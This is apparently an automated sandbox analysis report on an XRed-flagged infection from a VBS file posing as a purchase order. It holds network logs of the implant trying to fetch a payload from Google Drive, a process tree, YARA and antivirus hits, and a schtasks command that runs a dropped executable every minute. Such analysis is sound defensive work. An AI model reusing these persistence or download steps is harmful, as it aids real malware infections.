                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:20 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-06CfL4JKFl_k-g-hgpGPWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    147192.168.2.452264142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:20 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4aHx6kQx9R0gdQecS8gxBJwEPFlxf-gac1xVtxndf5zKGiamBCtWZQsn_G3lLwKU_v
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:21 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Wjhl5MgzCXV6qubf8yveSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 6e 75 6b 71 79 2d 39 57 76 68 47 62 4d 2d 33 4c 43 35 54 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="2nukqy-9WvhGbM-3LC5TQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    148192.168.2.452274142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:21 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kAWdBqbNFO2NlkIt4HBmGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    149192.168.2.452275142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:21 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-p0w3KJeOq67qZM0QkW_2kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:05:50:44
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs"
                                                                                                                                                                                    Imagebase:0x7ff783050000
                                                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1726636255.000002319FC25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1724447854.00000231A04BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                    Start time:05:50:51
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:2'203'648 bytes
                                                                                                                                                                                    MD5 hash:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:05:50:51
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2971041978.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:05:50:53
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                                    MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:05:50:53
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                    Imagebase:0x780000
                                                                                                                                                                                    File size:53'161'064 bytes
                                                                                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:05:50:53
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:05:50:53
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                    Start time:05:50:53
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                                                                                                                                                                                    Imagebase:0x600000
                                                                                                                                                                                    File size:147'456 bytes
                                                                                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000009.00000002.2950835598.0000000003018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000009.00000002.2954705649.0000000003280000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                    Start time:05:50:54
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                    Start time:05:50:56
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Imagebase:0x8a0000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 87%, ReversingLabs
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:05:51:03
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                                    MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                    Start time:05:51:11
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                                                                                    Imagebase:0x8a0000
                                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                                    MD5 hash:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:05:51:11
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4768
                                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                    Start time:05:51:11
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4836
                                                                                                                                                                                    Imagebase:0x10000
                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:05:51:19
                                                                                                                                                                                    Start date:30/12/2024
                                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
